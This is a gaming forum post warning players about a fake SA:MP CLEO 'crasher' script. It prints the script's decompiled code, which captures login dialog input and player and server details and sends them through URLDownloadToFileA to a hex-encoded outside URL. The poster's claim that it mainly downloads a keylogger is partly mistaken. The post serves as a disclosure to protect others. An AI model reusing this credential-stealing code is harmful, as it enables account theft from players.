blackHat
Expert
- Joined
- Jul 28, 2013
- Messages
- 930
- Reaction score
- 2
Hello,i'm reporting a fake cleo i think and it is installing virus/keylogger to your system
this is the link > Don't Use It !!> http://wikisend.com/download/417512/crasher.cs
i got the crasher from [member=21733]beatc[/member] by pm , he was asking me the activation keys
well it was crypted ,, but i could decrypte it xD ,, it is auto active anyway.
ok now this is the code
this is virus ,, yes i think it is fake and download virus on your pc
if you noticed this code
you will know that this will download virus/keylogger on your system and it's called >> 2352sfe.tmp << i think it is located in user/yourPCname/AppData/Temp/
----
i wish you guys didn't use it before ,, you should do a full scan with at least 2 antiviruses to locate the virus and delete it if you did !
Please Any One Up And Active And Know Cleo Codding , Confirm This If It Is Right!
others thoughts and believes :
springfield: not virus, not crasher, steal sa:mp password.
thanks for reading my report.
this is the link > Don't Use It !!> http://wikisend.com/download/417512/crasher.cs
i got the crasher from [member=21733]beatc[/member] by pm , he was asking me the activation keys
well it was crypted ,, but i could decrypte it xD ,, it is auto active anyway.
ok now this is the code
Code:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
//-------------MAIN---------------
0000: NOP
if
29@ = SAMP.Base()
else_jump @Noname_35
0A93: end_custom_thread
not SAMP.Available
else_jump @Noname_55
wait 100
jump @Noname_35
13@ = 13
wait 0
if
:Noname_55
SAMP.IsDialogActive(-1)
else_jump @Noname_442
0@ = SAMP.GetDialogType()
if or
0@ == 3
0@ == 1
else_jump @Noname_442
12@ = SAMP.GetDialogID()
wait 0
not SAMP.IsDialogActive(12@)
else_jump @Noname_116
alloc 7@ 516
alloc 4@ 32
alloc 11@ 100
alloc 20@ 32
SAMP.ShowDialog(17, "", "", ".", "", DIALOG_STYLE_MSGBOX)
SAMP.CloseDialog(1)
SAMP.DialogRespond(-1, 0, 0, 20@)
0AC6: 1@ = label @Noname_449 offset
10@ = SAMP.GetSAMPPlayerIDByActorHandle($PLAYER_ACTOR)
2@ = SAMP.GetPlayerNickname(10@)
3@ = Player.Money($PLAYER_CHAR)
SAMP.GetCurrentServerAddress(4@, 5@)
11@ = SAMP.GetCurrentServerName()
format 7@ "%slog=%s&srvr=%s:%d&inf=%s&mn=%d&servname=%s&did=%d&stuid=%d" 1@ 2@ 4@ 5@ 20@ 3@ 11@ 12@ 13@
0AA2: 8@ = load_library "urlmon.dll" // IF and SET
0AA4: 9@ = get_proc_address "URLDownloadToFileA" library 8@ // IF and SET
0AA5: call 9@ num_params 5 pop 0 0 0 "%TEMP%\2352sfe.tmp" 7@ 0
free 7@
free 4@
free 11@
free 20@
0AA3: free_library 8@
jump @Noname_62
hex
68 74 74 70 3A 2F 2F 6B 61 74 2E 63 6D 68 6F 73
74 2E 72 75 2F 61 64 64 2E 70 68 70 3F 00
endthis is virus ,, yes i think it is fake and download virus on your pc
if you noticed this code
Code:
11@ = SAMP.GetCurrentServerName()
format 7@ "%slog=%s&srvr=%s:%d&inf=%s&mn=%d&servname=%s&did=%d&stuid=%d" 1@ 2@ 4@ 5@ 20@ 3@ 11@ 12@ 13@
0AA2: 8@ = load_library "urlmon.dll" // IF and SET
0AA4: 9@ = get_proc_address "URLDownloadToFileA" library 8@ // IF and SET
0AA5: call 9@ num_params 5 pop 0 0 0 "%TEMP%\2352sfe.tmp" 7@ 0you will know that this will download virus/keylogger on your system and it's called >> 2352sfe.tmp << i think it is located in user/yourPCname/AppData/Temp/
----
i wish you guys didn't use it before ,, you should do a full scan with at least 2 antiviruses to locate the virus and delete it if you did !
Please Any One Up And Active And Know Cleo Codding , Confirm This If It Is Right!
others thoughts and believes :
springfield: not virus, not crasher, steal sa:mp password.
thanks for reading my report.
